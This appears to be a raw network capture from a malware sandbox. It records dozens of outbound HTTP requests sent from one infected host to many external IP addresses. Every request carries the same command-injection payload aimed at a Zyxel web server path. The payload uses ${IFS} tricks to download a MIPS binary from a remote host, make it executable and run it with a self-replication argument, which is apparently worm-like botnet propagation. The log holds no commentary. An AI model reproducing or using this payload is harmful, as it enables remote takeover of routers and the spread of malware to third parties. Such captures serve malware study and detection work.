                                                        Feb 2, 2024 06:21:07.886543989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3917192.168.2.1458378194.133.147.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886569023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3918192.168.2.145251432.193.7.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886607885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3919192.168.2.1442684191.52.45.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886641979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3920192.168.2.14408329.153.202.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886668921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3921192.168.2.1438304113.149.189.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886703014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3922192.168.2.1455072209.151.242.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886754036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3923192.168.2.1438760195.46.140.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886811018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3924192.168.2.1452768218.95.217.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886845112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3925192.168.2.1440234142.115.231.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886885881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3926192.168.2.144086457.189.133.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886928082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3927192.168.2.1438752151.211.49.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.886956930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3928192.168.2.1433988220.237.139.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887018919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3929192.168.2.143972819.101.153.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887062073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3930192.168.2.1447892183.10.127.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887098074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3931192.168.2.145590473.28.126.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887144089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3932192.168.2.1437116114.14.81.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887165070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3933192.168.2.144890680.40.54.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887201071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3934192.168.2.145533693.168.205.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887263060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3935192.168.2.1438974175.168.89.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887288094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3936192.168.2.144943841.80.36.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887331009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3937192.168.2.144877042.45.197.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887358904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3938192.168.2.1459930211.105.77.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887417078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3939192.168.2.1450408193.36.20.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887455940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3940192.168.2.1439032131.110.188.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887496948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3941192.168.2.143870465.121.84.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887546062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3942192.168.2.1441866177.178.24.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887586117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3943192.168.2.145336639.51.2.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887633085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3944192.168.2.1445154165.94.103.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887670040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3945192.168.2.1438672162.72.144.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887701035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3946192.168.2.14426768.104.179.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887763023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3947192.168.2.1435304164.64.28.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887770891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3948192.168.2.1436142185.135.223.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887820005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3949192.168.2.1450226213.96.93.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887834072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3950192.168.2.1441514167.228.209.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887893915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3951192.168.2.143814825.41.69.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887938976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3952192.168.2.1451990165.6.161.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.887960911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3953192.168.2.1437318221.149.198.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888000011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3954192.168.2.145070085.227.208.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888050079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3955192.168.2.1444132223.49.213.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888096094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3956192.168.2.145396493.114.204.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888108969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3957192.168.2.1442644159.170.171.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888166904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3958192.168.2.1443220184.155.156.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888191938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3959192.168.2.144164682.186.187.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888245106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3960192.168.2.143540237.14.190.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888288021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3961192.168.2.143676818.78.5.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888338089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3962192.168.2.1443926114.230.243.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888371944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3963192.168.2.1455482108.117.150.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888411045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3964192.168.2.1440932202.253.212.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888461113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3965192.168.2.1454266120.144.84.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888499975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3966192.168.2.1439990147.194.145.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888556957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3967192.168.2.1440076130.243.104.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888598919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3968192.168.2.1459898131.173.70.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888645887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3969192.168.2.1459756188.178.107.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888676882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3970192.168.2.144148692.14.67.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888709068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3971192.168.2.1447976221.225.206.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888752937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3972192.168.2.1457720137.164.3.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888789892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3973192.168.2.1439738140.133.137.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888811111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3974192.168.2.144361847.9.96.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888861895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3975192.168.2.1455168150.122.173.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888890982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3976192.168.2.145438087.225.155.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888935089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3977192.168.2.1453174170.118.17.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.888978958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3978192.168.2.1437708144.214.29.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889023066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3979192.168.2.1441884145.54.243.202443
                                                        TimestampBytes transferredDirectionData
